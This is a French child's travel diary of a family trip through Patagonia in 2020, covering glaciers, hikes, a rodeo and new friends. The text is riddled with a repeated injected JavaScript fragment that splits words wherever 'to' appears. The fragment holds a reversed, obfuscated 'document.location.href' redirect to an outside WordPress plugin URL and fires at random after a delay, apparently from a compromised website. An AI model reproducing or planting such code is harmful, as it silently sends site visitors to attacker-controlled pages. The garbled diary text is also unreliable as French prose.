Jeudi 30 janvier 2020 Chili, Torres del Paine
Ce matin, on a fait une randonnée au bord d’un lac. L’eau était froide et elle était bleu ciel. J’ai vu pour la première fois de ma vie des icebergs ! Et aussi un glacier ! C’est une grande montagne de glace et les icebergs sont en fait des bouts de glacier qui se sont détachés. A cause de la pollution le glacier est plus petit qu’autrefois. Les icebergs étaient très beaux!, C’est dommage qu’on n’ait pas pu prendre un bateau. On a fait une deuxième rando qui était très compliquée à cause du vent. On ne pouvait pas aller au sommet parce que même Papa s’est fait emporter par le vent ! C’était beaucoup trop dangereux. Le problème du vent c’est que c’est très compliqué de s’y habituer car il change toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le temps de force et c’était très compliqué de garder l’équilibre. On a bien vu les montagnes des Torres del Paine. Elles sont très belles. En revenant vers le camion on a vu un message sur le pare-brise. C’est Jacques et Martine Baratier ! On les a vus un moment. C’était bizarre parce qu’on n’avait pas du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout prévu de se retrouver ici.
La première rando s’appelle le Lago Grey, et la deuxième : Mirador del Condor. Et j’ai vu 3 condors!!!
Vendredi 31 janvier 2020
On s’est levé à 5h du matin. On a marché énormément après on est arrivé au lac. L’eau était très froide ! On a vu les Torres del Paine et on les voyait très bien parce que il n’y avait pas de nuage. Leur hauteur est de 2800m! En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout on aura marché 9h et 22km. Pendant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la randonnée on a suivi une rivière.
Dimanche 2 février 2020 Argentine, El Calafate.
Aujourd’hui on a vu un glacier qui s’appelle le Peritoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Moreno. ll est très beau. Au début de la ballade on a entendu un énorme bruit et on a vu que c’était un gros morceau de glacier qui s’était effondré. Mais on a vu aucun gros morceau toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber en direct par contre on a vu plein de petits morceaux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber. Quand ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombaient ça faisait énormément de bruit, même si ils paraissaient toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout petit. L’eau au pied du glacier était laiteuse, on aurait dit du lait.
Le soir on a vu un spectacle de rodéo sur chevaux. Au début, ils attachent les chevaux avec une corde très courte à un poteau. Après ils leurs bandent les yeux et après avec un autre cheval ils le poussent très fort pour le stresser. Puis le cavalier monte dessus et libère le cheval qui fait des sauts et cabre. 2 chevaux sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombés à terre. L’un des cavaliers a réussi à sauter de son cheval mais l’autre s’est fait écraser. Je trouve que les chevaux blancs sont souvent plus énervés que les autres.
Lundi 3 février 2020
On est allé à un musée qui explique les glaciers.
Mercredi 5 février 2020, Argentine, El Chalten
On s’est encore levé à 5H du matin et on a fait une grande randonnée. Une fois arrivés, on a vu un grand lac et le Fitz Roy derrière.
Vendredi 7 février, Argentine El Chalten.
On s’est levé à 6h du matin pour faire une randonnée de 18km à la laguna Torre. On a vu plein de petits bouts d’Iceberg et papa est allé en chercher un. Avec Alice on a essayé d’en ramener un autre mais le problème c’est qu’on en voyait qu’un petit bout car toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le reste était sous l’eau. Papa nous a aidé à le ramener et après on a fait un bonhomme d’Iceberg !! C’est comme un bonhomme de neige mais avec un iceberg.
Samedi 8 février 2020
On est allé dans un parking et on a vendu des bracelets qu’on avait fabriqués. Tous nos bracelets ont été vendus. Avec Alice on est trop contents !!! On les vends 50$
Lundi 10 février 2020
On a pris un piste pour aller dans un endroit où il y avait pleins de traces de mains qui ont été faites il y a 13000 ans !!! Çà s’appelle la Cueva de las Manos. On les voyait très bien !
Mercredi 12 février 2020 Argentine, Los Antiguos
Aujourd’hui on a loué une canne à pêche et on a péché sur le lac de Buenos Aires. Et on est rentré bredouilles….
Jeudi 13 février 2020 Argentine, Los Antiguos.
On a rencontré Walter et sa famille. Le fils s’appelle Fantino (mais on l’appelle Tino). Ce sont des Argentins qui ont une Chacra (verger) de cerisiers. J’ai beaucoup joué avec Tino même si on ne se comprenait pas beaucoup. Il nous a fait visiter la chacra. Après sa mère nous a emmenés au bord d’un rio, je me suis un peu baigné mais l’eau était gelée!!! Tout le monde m’encourageait alors pas le choix : J’ai dû me tremper de la tête aux pieds !
Après on a joué avec des ballons remplis d’eau qu’on se jetait dessus. Et on est aussi allé à leur magasins et dans la partie privée ils ont un géant trampoline et on s’est bien amusés !